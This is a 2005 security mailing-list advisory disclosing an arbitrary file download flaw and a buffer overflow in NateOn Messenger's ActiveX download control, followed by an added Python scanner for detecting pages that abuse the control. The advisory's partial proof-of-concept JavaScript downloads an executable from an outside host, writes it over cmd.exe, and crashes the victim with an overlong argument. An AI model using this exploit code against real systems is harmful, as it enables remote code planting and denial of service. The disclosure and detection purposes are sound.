[VulnWatch] [NRVA05-08] - Arbitrary file download by NateOn Messenger's ActiveX and DoS

From: saintlinu (saintlinu@private)
Date: Wed Sep 28 2005 - 20:36:27 PDT


Title:             Arbitrary File Download by NateOn Messenger's ActiveX and DoS

Discoverer:        PARK, GYU TAE (saintlinu@private)

Advisory No.:      NRVA05-08

Criticality:       Moderately Critical

Impact:            Arbitrary file download by NateOn Messenger's ActiveX and DoS

Where:             From remote

Operating System:  Windows only

Solution:          Not patched yet

Workaround:        N / A

Notice:            09. 17. 2005 Initial notification

                   09. 23. 2005 2nd notification

                   09. 27. 2005 3rd notification

                   09. 29. 2005 Vendor did not respond. Vulnerability disclosed

 

Description:

NateOn Messenger (see NRVA05-02) is an Internet instant messenger like MSN, Yahoo and so on.

If NateOn Messenger is installed, a remote web page can exploit it through the 'NateonDownloadManager.ocx' ActiveX control: the control downloads a file from an arbitrary URL to an arbitrary local path.

There is also another vulnerability, a buffer overflow, in the same control.

See the following details:

The full proof of concept is not included here; only a piece of the code follows.

 

<--snip-->

    // GotNate is the NateonDownloadManager.ocx object; its instantiation
    // (the <object> tag) is part of the omitted code
    i = GotNate.IsNateonInstall();

    if( i == 1 ) {
        alert('NateOn Messenger already installed. Do Attack ...');

        // if you want to second order attack then try
        // (downloads the remote file to an arbitrary local path, here overwriting cmd.exe)
        i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\system32\\cmd.exe');

        // if you want to crash the victim system then try
        // (an overlong third argument triggers the buffer overflow)
        i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_strings_in_here');
    } else {
        alert('NateOn Messenger NOT Installed');
    }

</--snip-->
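As an added defender-side example (not part of the original advisory or the vendor's code), the following script shows how a web proxy log or page-content scanner could flag script text that drives the NateOn download control the way the snippet above does: an IsNateonInstall() probe followed by Excute(mode, url, target) calls. The sample pages, the host example.invalid and the 260-byte cutoff (Windows MAX_PATH, beyond which the third argument cannot be a real save path) are assumptions made for this example.

```python
import re
from typing import Dict, List

# Matches calls such as GotNate.IsNateonInstall() or GotNate.Excute("1", '...', '...')
# on any object name; the method names come from the advisory's snippet.
CALL_RE = re.compile(r"\b(\w+)\.(IsNateonInstall|Excute)\s*\(([^)]*)\)")
# Extracts the quoted literal arguments of a call (double- or single-quoted).
STRING_RE = re.compile(r'"([^"]*)"|\'([^\']*)\'')
# Assumption: a "target path" longer than MAX_PATH is not a plausible file name,
# so it is treated as an attempt to trigger the overflow rather than a download.
OVERSIZED = 260

# Constructed sample inputs (not taken from the advisory).
BENIGN_PAGE = "<html><body><script>document.title = 'hello';</script></body></html>"
SUSPECT_PAGE = (
    "<object id='GotNate' classid='clsid:PLACEHOLDER-CLSID-NOT-FROM-ADVISORY'></object>"
    "<script>var i = GotNate.IsNateonInstall(); if (i == 1) {"
    r" i = GotNate.Excute(""" + '"1"' + r""",'http://example.invalid/payload.exe','c:\\windows\\system32\\cmd.exe');"
    r" i = GotNate.Excute(""" + '"1"' + r""",'http://example.invalid/payload.exe','""" + "A" * 600 + "'); }</script>"
)


def split_string_args(arg_text: str) -> List[str]:
    """Return the quoted literal arguments of a call, in source order."""
    return [dq or sq for dq, sq in STRING_RE.findall(arg_text)]


def scan_script(text: str) -> List[Dict[str, str]]:
    """Return one finding per call into the NateOn control found in the text.

    kinds: 'probe'            - IsNateonInstall() fingerprinting the victim
           'download'         - Excute() with a URL and a plausible local path
           'oversized_target' - Excute() whose target argument exceeds OVERSIZED
    """
    findings: List[Dict[str, str]] = []
    for obj, method, arg_text in CALL_RE.findall(text):
        if method == "IsNateonInstall":
            findings.append({"kind": "probe", "object": obj, "url": "", "target": ""})
            continue
        args = split_string_args(arg_text)
        url = args[1] if len(args) > 1 else ""
        target = args[2] if len(args) > 2 else ""
        kind = "oversized_target" if len(target) > OVERSIZED else "download"
        findings.append({"kind": kind, "object": obj, "url": url, "target": target})
    return findings


def summarize(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Count findings by kind, e.g. for an alert summary line."""
    counts: Dict[str, int] = {}
    for finding in findings:
        counts[finding["kind"]] = counts.get(finding["kind"], 0) + 1
    return counts


if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("suspect", SUSPECT_PAGE)):
        found = scan_script(page)
        print(f"{name}: {summarize(found)}")
        for f in found:
            print(f"  {f['kind']:17} obj={f['object']} url={f['url']} target={f['target'][:40]}")
```

Any Excute() call is worth alerting on, since the control lets an arbitrary page choose both the source URL and the destination path; the oversized-target class is separated out only because it points at the crash rather than the file-overwrite outcome.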



This archive was generated by hypermail 2.1.3 : Thu Sep 29 2005 - 08:54:29 PDT